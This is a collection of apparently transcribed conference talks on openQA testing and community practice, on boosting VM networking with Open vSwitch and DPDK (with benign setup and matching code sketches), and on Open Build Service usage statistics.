So, the next topic is actually just questions and answers around openQA, about the community and about the development process. I have not prepared anything, so... I didn't expect the big hall, but anyway. Actually, I have one question myself, and this goes actually straight to coolo, about the tool development process. Could you describe a little bit how you add new features and how you fix bugs in the openQA community? On the SUSE side I can add something myself. Do you want to start? Yeah, we have GitHub projects, like the os-autoinst organization on GitHub, and in that organization, as GitHub calls them, we have all the projects. We have os-autoinst for the backend stuff. We have openQA for the web UI and user management stuff, and we have os-autoinst-distri-opensuse for the tests, and for openSUSE we also have the needles there; it's called os-autoinst-needles-opensuse. And for all of them you can create pull requests and we will comment on them and review them, and for openQA specifically we have unit tests running on Travis that will report back on the pull request for the web UI itself. Okay, thank you. Are there many people outside of SUSE? How big is the openQA community? What would you say? Last time I checked there were 40 contributors to all these repositories. Mostly the largest contributions happened to the tests, obviously, because that's what the openSUSE community is interested in most. For openQA we have... Can I just... What? Use the microphone please. I think we have like two or three contributors maximum externally to the code base. So most of it is internal at SUSE? Mostly it's internally at SUSE, and we have the Fedora guys providing fixes they need, and lately we have someone from Aachen who's contributing. Okay. Maybe Dominic wants to share a little bit about how they use it for Tumbleweed and Leap? Yeah, I can give it a try. Of course at Tumbleweed we are heavily relying on openQA. For us the important part is actually knowing what's happening and having a direct channel to the developers, which we do using IRC. And I think generally it works fine. People are reactive. Sometimes it blocks a snapshot because something broke. Last week I think we had something, but nothing that takes forever to get a fix in. Okay, I can share something about how we actually use it in production at SUSE for testing the SLES versions. We have actually two cycles of openQA. First we have the so-called staging projects, where the developers can submit the packages into OBS, and then there is a kind of image that we put together for the staging project, where we run a bunch of tests to make sure that nothing breaks the image, and then this all goes into the build service, and after a build is created for SLES we do a full cycle of QA with a lot of different test cases in different areas: functional, kernel, migration and so on. That's how SUSE is using it for production QA. Are there any questions from anybody about the tool or about the development process? Anybody interested? Okay, you use some graphic library that can detect... Sorry? Yeah. You use some graphic library that can detect road signs, and when you have like two pieces of text which are black and white, so high contrast, and the outline has a few shades of gray difference because of different hinting, you get a 34% match. How does that... Pass the test? Pass the test, or what do you mean?
No, it probably doesn't, because it's a low match, but actually the text is very similar and the difference is only negligible compared to the contrast of the whole image. How does it... How do we do this? Okay, there are two things. First of all, this percentage depends on the size of the needle. If you have a big screenshot then the percentage gets kind of blurry. If you narrow down the area and the needle is pretty small then you have more failures. It's the same issue. The other thing is we can change the percentage at which a test case fails or passes. So we could say at 90% the test case passes or fails. Is that correct? Cool? Yeah. So we kind of have some space here where we say there's a certain percentage at which it fails or passes, and these two rules have to be applied to every test case, to every needle, to make sure that the test case passes or fails. Yeah, of course. Does that answer your question? There is some guideline that needles that have lower than 90% are completely useless because... I think that the percentage is fixed. It's at 90% or something like this. Yeah, but what I am asking is how do you apply that algorithm that detects road signs, which is like really fuzzy matching, because the road signs can be rusty and the cameras are blurry and all that. You get black and white text which is high contrast and you get a small outline only a few shades of gray different and it's rejected. Because we want it to. This is how we want it, because there are screens, for example, where the underline on the text in the UI element specifies the shortcut that you have to use. So you want to assert that if you press Alt-F the file menu opens. So you have to make sure that the F is actually underlined before you press it, which means there's a huge difference if the F is underlined or the L, and that's why we have to be very precise on the matching. And as Marita already mentioned, the needle can be tuned to be forgiving, but most of the time the product does not change its font randomly. These problems that I just outlined only happen if someone decides to change the font, and then all the screens create this problem, but not in general. Okay. Any other questions? Yeah, I have one. You mentioned that openQA can automatically write bug reports. Is that correct? Can write what? Automatically raise bug reports. No. No. No, that's not true. Actually you have a test case and the test case fails or passes for different reasons, and then the openQA engineer has to go and investigate why this test case is red or green. One reason could be there is a new feature in the product and the test case has to be adjusted. Another could be the product has a bug or failure, or somebody broke the test case, somebody broke the backend and so on. So these are either test-related issues or product-related issues, and this has to be done manually, actually. The engineers have to check the failing test case, and we have some methods here so that you can add a tag to this test case saying this is a bug and this is a product issue, and then this has to be investigated further. But this is actually done manually. So in other words you have a change control board? Yeah, actually I wouldn't say change control board, but it's actually the main work of product QA at the moment. So at QA, when we test SLES, we have this test automation framework. This is one part of our department's work, and the other part is really doing a review of the builds and of the test cases.
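For reference, the match level and the needle area that keep coming up in this exchange live in a small JSON file stored next to each needle screenshot. The following is a minimal, hedged sketch of such a file written from Python; the tag, the coordinates and the 96 percent match level are illustrative values, not taken from a real needle.

```python
# Hedged sketch of an openQA needle definition (the JSON that accompanies the
# needle PNG). Tag name, coordinates and match level are illustrative values.
import json

needle = {
    "tags": ["inst-welcome"],            # tags that test code asserts on
    "area": [
        {
            "xpos": 100, "ypos": 200,     # top-left corner of the compared region
            "width": 250, "height": 40,   # keep the area small for strict matching
            "type": "match",
            "match": 96                   # required similarity in percent
        }
    ]
}

with open("inst-welcome-20170527.json", "w") as f:
    json.dump(needle, f, indent=2)
```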
So we have implemented several groups who are doing a daily review or regular review of the builds, mostly one build a day, and they really look into each test case, make sure that we investigate it correctly and also make sure that we don't have false positives and all this kind of stuff. This is actually one of the two main jobs that we do at product QA at the moment. Do you also test GUIs like KDE? Do you also test GUIs like KDE? Yes, we test the operating system, the installation and applications on top, like KDE and GNOME as well, and other applications. So how do you handle things like when KDE crashes and Dr. Konqi kicks in, how do you handle KDE? How do you handle... I mean, if it's a KDE thing we report a bug. If it happens occasionally we kind of retrigger the test cases, but make sure that we track all this and report bugs if it's really on the KDE side. The tests have a post fail hook. So if they fail they will try to gather some logs to upload to the system, so that you don't have to rerun the test manually but have the logs right away in the system, so that we can provide the link to the failing test right to the developer and he has all the logs available. The crash dumps too? In most cases not, but other logs. Okay. Any other questions? Any other things? What time is it actually? I have some other questions with these tests. I run into these problems with different fonts as well, and when I look at the difference, if I see that there is no significant difference, could I like create a difference? Could I like subtract the outline from the area that is matched, so that I get only the parts of the letters that are fully... Yeah. I mean, you can narrow down the needle to the area that you're interested in and make sure that you really have the needle and image comparison in this area, and you can exclude all the other stuff that you're not interested in. Was this a question? Or... Like there is text and the difference is the outline, because there is different hinting or a slightly different font. Maybe it may be... if I run a different terminal it may be bold or... Okay. If you have a change of the font, like it's bold or not, it really depends on this percentage. If the percentage is matching 90% or more then you have a pass, if not it's failing. Well, it will not pass because the difference is too large, but I would like to... I would like to comment on what is available for investigation in the web UI currently. So what we do have available is the screenshot as it happened and the reference screenshot that it wants to compare with, and so what you can do is take these two images and calculate the difference. It's not done automatically, because it's not such a common case to have a difference in hinting or like a little shadow or blurry edge around the text that we would say we need this more often in testing, but I think it's quite easy and feasible to do because the data is available. And also what is reported is this value of match: is it a 0% match, like it could not match this anywhere, or anywhere in between, like, as we saw before, a 30% match or 60% match, where we say, yeah, probably the right content is shown but it differs, let's say, in a single character or maybe the hinting, as we mentioned. Okay, thank you very much Oliver. Any other questions from anybody? I have one question, because I just saw on the slides, to my own surprise, that we have openQA version 4.4. How do we plan these version numbers? I'm really surprised by this myself.
The 4.4 I think was done two months before last year's openSUSE Conference, and during the openSUSE Conference we discussed if we wanted to have 4.5, and we decided to wait for more features to be done, and so it has stayed at 4.4 since then. Okay, so my follow-up question here. Do we have something like a schedule for this? Does the community provide a schedule, or is it only an ongoing discussion in some daily stand-up meetings? And if not, would it be a good idea to implement something like this, a more formalized schedule for releasing or so? Possibly. No, we don't have any schedule and we don't do any releases at this point, because the main reason we did releases initially was that Fedora used the stable version that we provided, and they don't do this any longer. So there's not any appealing reason to do releases at this point. And Olly is moving more towards having a rolling release inside of Tumbleweed. But having an increasing version from time to time would make the message clearer that we're developing this thing and that it's not stale. But other than that, there's no rule. So the idea is more to move towards a rolling release, and this is already discussed in the development team or under investigation. So currently what we have in the GitHub repositories of os-autoinst as well as openQA is, let's say, on a near daily basis, new features added and fixes merged. And all of this is in a releasable state, because currently the tests that we run on each pull request ensure that the full web UI can be started and tests can be triggered. On top of that, within OBS, where we build packages for openSUSE and SLE, we are also incrementing the version numbers, so it's 4.4 and then some suffix to that. So each version number, of course, is unique. And what is currently done is that we have tests of openQA within openQA. So openQA is also testing itself, and the idea was to use the outcome of that in an automatic way to create a submission to openSUSE Factory, so that every release of that, if it passes its own test, will also be created as a submit request to provide a new version within openSUSE Factory and therefore openSUSE Tumbleweed. And we also have it in Leap, but for Leap we are probably trying to come up with a more stable way of releasing it. Okay, thank you very much. Actually, if there are no other questions, I can recommend the test case beginner training for openQA. Some QA engineers will show you how to write test cases in openQA later today in the workshop area. I think it's at four o'clock or something like this. Four forty five. Yeah, okay. Okay, Santi, do you have something against that? No. Sorry? It's four thirty. Okay, so at four thirty, Santi and Matias and Nick and Rodion, sitting there with the nice t-shirts, will do a test case beginner training if somebody is interested. Thank you very much.
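The needle-matching behaviour discussed in the Q&A above (a small needle area compared against a screenshot with a tunable match threshold, plus the manual "diff the two images" investigation step) can be sketched roughly as follows. This is an illustrative Python sketch, not openQA's actual implementation, which lives in os-autoinst; the file names and the 90% default threshold are assumptions for the example.

```python
# Illustrative sketch only -- not openQA code. It mimics two ideas from the
# discussion above: comparing a "needle" area against a screenshot with a
# tunable match threshold, and producing a difference image for inspection.
import cv2

def match_needle(screenshot_path, needle_path, threshold=0.90):
    screenshot = cv2.imread(screenshot_path, cv2.IMREAD_GRAYSCALE)
    needle = cv2.imread(needle_path, cv2.IMREAD_GRAYSCALE)

    # Normalized correlation: 1.0 is a perfect match, lower values mean the
    # area differs (e.g. different font hinting or a missing underscore).
    result = cv2.matchTemplate(screenshot, needle, cv2.TM_CCOEFF_NORMED)
    _, best_score, _, best_location = cv2.minMaxLoc(result)

    passed = best_score >= threshold
    return passed, best_score, best_location

def diff_image(screenshot_path, reference_path, out_path="diff.png"):
    # The "take the two images and calculate the difference" step that is
    # currently done by hand when investigating hinting or shadow mismatches.
    # Both images are assumed to have the same dimensions.
    a = cv2.imread(screenshot_path, cv2.IMREAD_GRAYSCALE)
    b = cv2.imread(reference_path, cv2.IMREAD_GRAYSCALE)
    cv2.imwrite(out_path, cv2.absdiff(a, b))

if __name__ == "__main__":
    ok, score, where = match_needle("screenshot.png", "needle-area.png")
    print(f"match={score:.2f} at {where} -> {'PASS' if ok else 'FAIL'}")
    diff_image("screenshot.png", "reference.png")
```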
Let's follow up on Coolo's talk, discuss technical details, ideas, etc. openQA is an automated testing tool, capable of full system, console, and graphical application testing, written in Perl. This session wants to bring together the openQA backend developers with test case writers and users of openQA to discuss ideas, bugs, improvements and so on. Newbies to openQA or any interested persons are welcome to join and share ideas, questions, etc.
10.5446/54463 (DOI)
Today we will see how you can use these technologies to improve the networking performance of your virtual machines. We will go through quite a few things to show you how these technologies work. We start with some background on virtualization, then we will talk briefly about Open vSwitch and DPDK, and at the end we will do a demo that puts all of this together. Basically, in virtualization you have the hypervisor, which is responsible for emulating the processor, the memory and all the devices, and the guests run on top of that. The problem with emulated devices is that every access the guest makes has to be trapped and handled by the hypervisor, which is very expensive and slow. The good thing is that you can emulate pretty much any device, so, as you can see here, the guests believe they have real hardware in front of them, but in reality it is the hypervisor that is emulating all of it. And of course, as I said before, there are different hypervisor technologies, like QEMU or VMware, and each of them emulates different devices, so for example one may emulate one kind of network card and another one a different kind, and you need the right drivers in the guest for each of them, which is quite painful. So the answer to this was paravirtualization: instead of pretending that the guest runs on real hardware, the guest knows that it is virtualized and talks to the hypervisor through a standardized interface, which for devices is virtio. With virtio the guest uses one set of drivers, the virtio drivers, and the hypervisor provides the backend for them, so you avoid most of the cost of emulating real hardware. Still, with the classic setup the virtio backend lives in the hypervisor process in user space, and behind it the traffic typically goes through a tap device handled by the kernel, so every packet still causes system calls and context switches between user space and the kernel. Obviously you cannot get line-rate performance this way. So one thing we need to do is reduce the number of context switches, and this is where vhost was born. Basically, vhost takes the virtio backend, the data path, and moves it into the kernel, so the packets no longer have to bounce through the hypervisor process in user space. But the host still needs something to switch the traffic between the virtual machines and the outside world, and that is the virtual switch, which is what I am going to talk about next.
So I am going to talk a little bit now about the virtual switch. Open vSwitch is a virtual switch, which means it does in software many of the things that a hardware switch does. You can do VLANs, spanning tree protocol, and you can also aggregate interfaces together, mirror ports and so on. And you can do all of this with OpenFlow. OpenFlow is supported by Open vSwitch and by many hardware switches as well, so it is more or less the industry standard way of programming the forwarding logic of a switch. Open vSwitch has two main components. The two key pieces are the kernel module and the user space daemon. Basically, all the intelligence, the logic and the control plane live in user space. The first packet of a flow that arrives at Open vSwitch is passed to user space. User space knows what to do with the packet, because you have used OpenFlow, or something else, to program the forwarding logic. After that, the flow is cached in the kernel datapath, so the following packets are handled entirely in the kernel. We don't need to cross the kernel/user space boundary anymore. The kernel module communicates with the user space application through netlink. So the user space application can always change the cache or invalidate the cache or update the cache as necessary. For most of the things that you do with virtual machines, Open vSwitch can be considered a drop-in replacement for the Linux bridge, so you can replace the Linux bridge with Open vSwitch and everything on top keeps working, because the design goal of Open vSwitch is to behave like a standard switch. Here, as we see, there is again the problem of context switches, because all the data plane is in the kernel. So every time we send a packet from the virtual machine to the external world, we need to cross this boundary. So one may think that it could be helpful to move all of the data plane to user space to avoid this latency. However, this is not always simple. Implementing a data plane in user space can be very complex. Usually there are quite a few bugs there. If you move the data plane to user space, then again somehow you need to talk to the real hardware, which is normally managed by the kernel. Then again you have to cross the boundary, which is not acceptable if you want to have line-rate performance. Maybe you've heard of PCI passthrough in the past, where you can assign real hardware to the virtual machine. So with PCI passthrough, for example, you can assign a graphics card to the virtual machine, or you can assign your network card to a virtual machine. This normally works, but there are a few problems here. If you do that, you cannot use this device on your real host and you cannot use this device within any other VM. The relationship here is exclusive. One VM per device, which is not very cost effective. You could have 12 network cards and 12 virtual machines, but this is not normally the best way to do it. Fortunately, hardware progressed over these years and software followed, with virtual function input/output. In this case, the hardware exposes virtual functions. What this means is that you have a, normally very expensive, network card where the functionality of the network card is exposed in virtual blocks.
Then you can assign these virtual blocks to a virtual machine. You have one network interface and perhaps 12, 32, 64 virtual functions. In reality, you can have 64 virtual machines sharing the hardware. They talk to the hardware directly. There are no intermediaries anymore. They do stuff like DMA. This is also what is known as SR-IOV. If we make use of this technology, then we can effectively move the hardware to user space, if you logically think about it, because now user space can use the VFIO interface to talk to the hardware directly. There is no kernel involvement anymore. There is one famous user of this VFIO, virtual function I/O: it is vhost-user, which is in DPDK, and my colleague will tell you a bit more about it. So, what is the problem we were talking about a second ago? The previous solutions always talk to the hardware through the kernel. We could really improve the performance if the virtual machine could directly talk with the hardware, rather than go through the kernel. To solve this problem, we have something called DPDK. One second. What DPDK is trying to do is... it is a library that we can use to receive and transmit packets. It just gives normal APIs to receive or transmit, or for any networking related work. A normal programmer can use those APIs to write any sort of software router or software switch. Another thing DPDK does is try to use all the architectural features to improve the performance, as we will see. Why do we really need DPDK? This should have been the first slide I talk about. All the NICs these days are moving really fast. We had 100 Mbps and now we have 100 Gbps. For 100 Gbps, if we want to receive a packet of 1.5K, we have only 123 nanoseconds, which is really tight. If we reduce the frame size to 84 bytes, then even for 10 Gbps we have only 67 nanoseconds. To compare it, let's say we have a 3 GHz CPU, which means around 200 CPU cycles. But even a single cache miss might take 32 nanoseconds, and then in the case of 10 Gbps and a very low frame size, just one cache miss might eat up half of the time that we have. DPDK tries to solve all those problems. What it does is use polling. Generally the kernel does everything through interrupts. Interrupts are really good if we want to utilize the CPU, but they are not really good for performance. What DPDK does is just poll for new packets, and it just burns the CPU and tries to get maximum performance out of it. It also uses user space. DPDK runs in user space, so there is no context switch. With VFIO, which Markos explained previously, we can expose the NIC hardware to user space, and DPDK accesses that hardware from user space and directly writes packets into the NIC. So there is no in-between kernel or any middleman. Another thing DPDK uses is hugepages. With hugepages, there is no TLB thrashing. If we use the normal kernel setup, with let's say 4K pages, and then we do a lot of DMA and stuff, there might be TLB thrashing if we have a really fast NIC. With hugepages we could have, let's say, 1 GB hugepages, and that's pretty much enough for a normal NIC. So that's the third problem DPDK solves. Another problem is thread affinity. In the case of the kernel, let's say the interrupt receiving core is core 0, but the application is waiting on, let's say, core 3. So the interrupt handler needs to notify the application that runs on core 3, which means it's not cache local. The data was in core 0 and then it needs to go to core 3.
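The per-packet budgets quoted a moment ago are simple arithmetic; here they are as a small worked example in Python. The 1538-byte figure assumes a 1500-byte payload plus Ethernet framing overhead, and 84 bytes is the minimal frame including preamble and inter-frame gap; both are assumptions used only to reproduce the quoted numbers.

```python
# Worked example of the per-packet time budgets quoted in the talk.
# Frame sizes are bytes on the wire (payload plus Ethernet overhead).

def packet_budget_ns(frame_bytes: int, link_gbps: float) -> float:
    bits_on_wire = frame_bytes * 8
    return bits_on_wire / (link_gbps * 1e9) * 1e9  # nanoseconds per frame

def cycles(budget_ns: float, cpu_ghz: float = 3.0) -> float:
    return budget_ns * cpu_ghz  # CPU cycles available per frame

# ~1.5 KB frame at 100 Gbps: about 123 ns per frame
print(packet_budget_ns(1538, 100))        # ~123 ns
# 84-byte minimal frame at 10 Gbps: about 67 ns per frame
print(packet_budget_ns(84, 10))           # ~67.2 ns
# On a 3 GHz CPU that 67 ns budget is only ~200 cycles, and a single
# cache miss (~32 ns) already burns roughly half of it.
print(cycles(packet_budget_ns(84, 10)))   # ~201 cycles
```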
You could, it's possible to solve this in the kernel as well with pthread affinity, and DPDK pretty much does the same thing. Okay, so let's look at how Open vSwitch with DPDK looks. So before, the user space data path... it was in the kernel, and with DPDK everything has moved into user space now. And we have the PMD, which is the poll mode driver, and there are poll mode drivers for every sort of NIC. Mostly, I mean, they support a lot of NICs actually. So with the poll mode driver, Open vSwitch can directly write the packet into the NIC. There is no kernel intervention. It just goes, sorry, directly to the NIC. All right. So if we put everything together, we have the guest OS, we have a DPDK interface, and we have Open vSwitch which is compiled with DPDK. So there's the Open vSwitch bridge. All right. Yeah, so the guest OS can now actually, if you do PCI passthrough and then run DPDK, the guest OS could technically write directly to the hardware. In this case there will not be a lot of copies; there will be at least one copy from the guest to OVS. Yeah. Okay, so. Okay, let's show some demos. In the first demo I'll run two virtual machines and I'll run iperf from them. In the first one, I'll use a tap interface for the virtual machines. And then in the second one, I'll use vhost-user with DPDK. I'll just show how the performance differs. Let's see. Okay. So this is the first one, where I'm running two virtual machines and they are connected with a tap interface. All right. So this is how I created those two VMs. Okay, it could take some time. Okay, so I started the iperf server and that's the client. So we are getting around two Gbps. Let's run it again. So this is what we get with the tap interface. I mean, it's running on my laptop, so if we have a really powerful machine, these numbers might be higher. So I'll start the second demo, where we run the virtual machines and I use vhost-user for the NIC. So when you create the interface in Open vSwitch, it creates a socket, and we have to give the socket to QEMU so that all the control communication can happen. All right. So all the numbers that we are getting could be tuned more. We could use multi-queue on the interface, or we could use more memory. So these are just normal demonstrations, but it can be tuned to get more performance. Okay, let's see. Well, so it's at least giving more than two Gbps with vhost. So yeah, I mean, this number can go to like eight or nine, but I think my machine is pretty much hogged. So that's why it's not so much higher than the tap interface, but it could grow more. Okay, so that's demo one. In the second demo, I'll try to show how DPDK can be used to build a normal software switch. So I have two bridges and three virtual machines. So virtual machine one and virtual machine two will try to communicate with each other through iperf. And I'll connect those two bridges with another virtual machine that runs the DPDK l2fwd application. It just takes the packets and forwards them to another port, so any packet coming from bridge zero, it just pushes to bridge three, and the same from bridge three to bridge zero. Okay. So this is the machine that runs DPDK l2fwd. So, good. There are two virtio-based interfaces, from bridge zero and bridge three. So I'll just bind those interfaces to vfio-pci so that DPDK can map those hardware registers into user space. So we'll try to do that. All right. So this is the application.
So it says it runs on four cores and it's not doing any updating of the MAC addresses. And we are giving port mask three. We have two interfaces, so if you convert three to binary it covers both ports. That's why it's three. Let's start it. So even with one extra layer it is kind of similar performance to the tap interface. All the packets are going through another intermediate VM, and this I think is still better than the tap interface. And you can see some statistics there. So yeah, that's about the demos. If you guys have some questions... Not really fast, I mean, this is kind of similar, but there is an intermediate VM involved, so it's still okay. I mean, all those numbers will be different if we run it on real hardware. This is my laptop, it's pretty bad. Any questions, or shall we close the session? Okay. Thanks a lot. Thanks a lot for coming. Thank you.
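The vhost-user wiring used in the first demo is only described verbally, so here is a rough reconstruction of what such an OVS-DPDK plus QEMU setup typically looks like. It is a sketch under stated assumptions, not the presenters' actual scripts: the bridge and port names, socket path, memory sizes and disk image are placeholders, OVS is assumed to be built with DPDK support and already initialized, and the exact options depend on the OVS and QEMU versions in use.

```python
# Rough reconstruction of a vhost-user setup like demo 1 -- not the
# presenters' actual commands. Names, paths and sizes are placeholders.
import subprocess

BRIDGE = "br0"
PORT = "vhost-user1"
# Common socket location for OVS builds; adjust to your install prefix.
SOCKET = f"/var/run/openvswitch/{PORT}"

def sh(cmd):
    print("+", " ".join(cmd))
    subprocess.run(cmd, check=True)

# Userspace (netdev) bridge with a vhost-user port served by OVS-DPDK.
sh(["ovs-vsctl", "add-br", BRIDGE, "--", "set", "bridge", BRIDGE,
    "datapath_type=netdev"])
sh(["ovs-vsctl", "add-port", BRIDGE, PORT, "--", "set", "Interface", PORT,
    "type=dpdkvhostuser"])

# QEMU side: hugepage-backed guest memory shared with OVS, and a virtio NIC
# whose backend is the vhost-user socket created above.
qemu = [
    "qemu-system-x86_64", "-enable-kvm", "-m", "1024",
    "-object", "memory-backend-file,id=mem,size=1024M,"
               "mem-path=/dev/hugepages,share=on",
    "-numa", "node,memdev=mem", "-mem-prealloc",
    "-chardev", f"socket,id=char1,path={SOCKET}",
    "-netdev", "type=vhost-user,id=net1,chardev=char1,vhostforce",
    "-device", "virtio-net-pci,netdev=net1",
    "-drive", "file=guest.qcow2,if=virtio",
]
sh(qemu)
```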
Using OvS + DPDK to boost inter-VM network traffic. Improving virtual workloads is an ongoing and complex problem. Many of the optimizations target the networking stack, which is becoming a bottleneck as the traffic traverses from the hypervisor to the virtual machine and vice versa. As a result, improving the components that sit in between is normally the first thing to look at. One such component is Open vSwitch, which is a popular virtual switch heavily used in OpenStack. Another component is the Data Plane Development Kit (DPDK). We are going to briefly discuss how these components work and how they can be combined together. At the end there will be a short demo showing these technologies in action.
10.5446/54466 (DOI)
Okay, so OBS in numbers. I will start by introducing myself. My name is Ana and I'm working in the OBS frontend team. Let's start with a short introduction about OBS. The service is a generic system to build and distribute binary packages from sources in an automatic, consistent and reproducible way. Now I'm going to talk about the numbers from our public instance, build.opensuse.org, which is what probably all of you, or most of you, use. So these are today's numbers, or from some days ago: we have 46,891 users, 46,292 projects, 470,118 requests, 794,210 reviews and 44,219 comments. So yeah, quite big numbers. And then let's talk about some more interesting data. First, users. I already said that we have 46,891 users, but this is how it looks over time. So yeah, we can already see here that over this period there were more users; maybe it's easier to see here. Here the points are the number of users that were created every month, and the blue line is there so you can see it without the points far away, so it's the regression of the points. So we can see some interesting things here. We see points over here where in some months we have more than 80 new users, and then zero or almost zero new users in some other months. And then, yeah, you see this thing that I already mentioned in the previous graph. You could say, yeah, we had many new users at some point, but now it doesn't seem that we have that many. It could be that OBS is not that popular anymore. Yeah, OBS is great, so of course not; it is something we can explain. It is related to the diffusion of innovations theory, which basically applies to all new software, and in general to any product. It describes how people get used to a new tendency in the market. So basically you have the innovators, who are well educated, with more sources of information, and who are also more open people than the early adopters. The early adopters also have a lot of sources of information and are popular and social leaders; they are followed by the early majority, which is more doubtful about using new technology, but also joins. Then we have the late majority, which is less innovative; they don't like new techniques that much, but when most people have joined, they also join. And at the last point we have the laggards, who are basically the people that join because everybody else is already there. So this is the Gaussian function. And if we go back, we can see that we also have it here. So when the product was basically new there was the innovation, and after that there was not that much innovation anymore, and that's why the number of new users keeps more or less stable. So it's not that we are doing anything wrong or that OBS is not popular; it's something normal. So now the requests. Yeah, as I already said, we have 470,118 requests, and as a curious piece of information, the average time for a request to get accepted is 140 hours, or something less than six days. Yeah, of course, it can be some months for some projects or packages and maybe a few minutes for some others, but that's the average. And yeah, what percentage of our requests get accepted? Not all of them, but most of them, 77%. And the next percentage that we see here, painting it by state, is superseded. That means that they were not just closed, but that we kept working on them, so that's also quite good. And then we also have some revoked and declined ones; those are more or less the bad ones, but we close them, and it's not that big a number. And then we also have the new ones and the ones in review, which are the ones that are open or in process now.
That number is low because the data is from some days ago. And then we have the deleted ones; currently only admins can delete them, and it was probably like that for the whole history of OBS, which is why we don't have many deleted requests. So now let's move to the collaboration activity: how much people collaborate inside OBS. Yeah, that's the total activity over time. The first time I saw this graph, I thought, okay, why does it have this shape, and why, I don't know if you see it, I will put another graph where you can see it better later, but these peaks here, why are they there? My first guess was that maybe the main projects affect this graph. And we see that they maybe affect the shape, because all of them seem to be a combination between a linear and an exponential function, and every time we have more and more projects, so it makes sense that that gives it the shape, but we don't see any peak in any of the main projects, like Factory, which is the biggest one, that could cause this here. Okay, then I thought, okay, maybe the releases are affecting this graph. But I painted them in and they also don't seem to affect the graph, or at least they cannot be the only reason for the peaks. So I thought, okay, what can that be? Then I found the number of active projects. I mean, small or medium projects, and also the big ones, but the number of projects that are active, even if they are really, really small. And if you paint it together with the total activity, you can already see, more or less, that where there are peaks in one of them, there are peaks in the other. I wanted to show it to you properly, so I took the derivative of the function on top, and then you can already see that everywhere there is a peak here, there is a peak in the other one. Yeah, I calculated the correlation and it is really, really high, 0.85. So maybe it's not the only reason, but at least it is the most important reason why our collaboration activity increases: it is the number of projects, and not the biggest projects. So I found that quite curious. And then there is something else that catches your attention, because there was something that caught my attention, and it is that there are no holidays. So probably the OBS user looks something like this, because, yeah. Okay, and now let's talk about the hardware we have for this instance. Yeah, I read some days ago that the human brain can store between one and ten terabytes, and on average something like three. So I will tell you the numbers in human brains so you can remember them better. We have 15 terabytes for the source server host, so around five human brains. For the four repository server hosts: the first one, which is for the distributions, has 19 terabytes, so around six human brains. Then the home projects one is 10 terabytes, around three human brains. Then the staging one, which is for testing and openQA and so on, is only around one human brain. And then we have the rest, and that is seven terabytes, so around two human brains. And then we have 10 scheduler architectures, which are all of those you see here. Yeah. So now the workers: we have 178 hosts and 1180 workers, and you can also see it per architecture. So for example, here for this one, which is the biggest one, we have 124 hosts and 841 workers. So now the system. The source activity per day: we have osc check-ins, around 2300.
In the user interface that is only 600, so much less, so most people are using osc for that. And then we have around 300 branches. That is also quite a lot, because that is only for one day. And now here we have the binary activity by build type. So yeah, the numbers are the same ones I already mentioned in total, but here you can see when they fail, succeed or are unchanged. And unchanged basically means that it was built, and also successfully, but the result didn't change, so it was not updated. And then here, this one that seems to be zero is not zero, because you could think, oh, the distributions never fail. No, they also fail. But I don't remember, I think the number was 98, and 98 compared with 50,000 is nothing there. So yeah, we can see some curious things, like staging is the one that fails the least compared with the rest. And then the distributions are the ones that change the most: when we build them, we have to update the result because it changed. So yeah, curious. And then some data that we have in OBS, so that you can access it now or whenever you want: we have statistics from the last build for every package. For example, for this one, which is for our OBS instance in OBS, we have how long the build task took, 31 seconds, and the disk space it used. Yeah, some information you can check. And also on our main page we have the system status, so the number of build jobs during the last week. And it also tells you here how many build hosts there are, how many packages are waiting and so on. And then on our monitor page, you can also see how many workers are building, here in this one, how many workers are dead, down, away and so on. And also here, how many packages are waiting to be built or how many are blocked. So the first thing you see here, when we select one month here, is this thing here, which, as probably some of you will remember, is that OBS was down for several days around two weekends ago. So that's why we have this here. And also you can see, I didn't calculate it, but I think it's really obvious, that the number of workers building, so the green part at the top, has some relation with this graph. So yeah, it makes sense. The number of packages that are waiting to be built more or less follows the number of workers that are building, because yeah.
So yeah, and if we want to see it for a longer period, we have here one year, and then we can see something, for example here we have more workers, and that's because new machines were added, and then also here the number of workers decreased just because some of them were turned off. And you can also see things like here, this one. That's Santiago breaking OBS some days ago. Yeah, hi Santiago. Yeah, you see here that there were fewer things working, because OBS was broken, because Santiago broke it. Yeah. And now let's talk about our project on GitHub. We have 125 contributors in the whole history of OBS, 32 in the last year. So yeah, quite a lot. And then the number of pull requests merged. Yeah, you can see that in this period there were no pull requests, and then they started like crazy. So yeah, push to master, basically. Since more or less two years ago, at least on the frontend side, we started working with pull requests, although the backend still keeps working without them; that's why at the beginning you see, okay, no pull requests at all, because they just pushed to master. And then you see the code frequency. In the second part, you can see some relation with the previous graph, but in the first part there was also some activity, although there were no pull requests. And also the code frequency doesn't match the pull requests exactly, because, as I said, the backend is also in the same repository and they are not using pull requests. That's why these two graphs look quite different. And yeah, this is the commit activity from the last year. It is per week; that's why it oscillates that much, because depending on the week there are more or fewer commits. You may wonder what that is. I took the data at the beginning of this week, so this week there were no commits yet; that's why it seems that this week we didn't do anything. If I took it now, it would look nice. And now, the code here also includes other things related to OBS, like osc, and that is why, as we will see in the lines of code later, we also have Python. Yeah, this is the total lines of code: we have 282,192 lines of code, although you see that not everything is code lines; you also have 12% of blank lines there and 11% of comment lines. And then here are the lines of code by language. As I said before, we are also taking osc into account here, not only the GitHub repository of OBS, and that's why we also have Python. And then there is mainly Ruby, which is the frontend, Perl for the backend, and then some other languages over there. And that was all. But there is more: the talks from other people also related to OBS. Björn will hold his talk here when I finish. Then you also have Simon and Adrian's talk, followed by a workshop about AppImage, and "Get packaged into Package Hub" by Wolfgang, who had his talk yesterday and will continue with the workshop today. And then "Take me to Leap" by Axel. And yes, two more: a packaging workshop by Simon and a replaceable files discussion by Bernhard. And that was all. Are there any questions? No? Great, because otherwise I'm here to talk about my cat. If there is a question in the back, it would be cool to answer it. Okay, thank you very much.
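The peak analysis described in the talk, differentiating the cumulative activity curve and correlating it with the number of active projects per month to get the quoted 0.85, can be reproduced with a few lines of NumPy. The exact method the speaker used is not shown, so this is only a plausible sketch, and the two example arrays below are made up; the real monthly series would be plugged in instead.

```python
# Sketch of the analysis described above: differentiate the cumulative
# activity curve and correlate the result with the number of active
# projects per month. Example data is invented for illustration.
import numpy as np

total_activity = np.array([100, 230, 390, 700, 820, 1100, 1500], dtype=float)
active_projects = np.array([12, 15, 18, 30, 21, 27, 38], dtype=float)

# Month-to-month change of the cumulative activity (discrete derivative).
activity_delta = np.diff(total_activity)

# Pearson correlation between the activity change and active projects,
# dropping the first month so both series have the same length.
r = np.corrcoef(activity_delta, active_projects[1:])[0, 1]
print(f"correlation: {r:.2f}")  # the talk reports roughly 0.85 on real data
```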
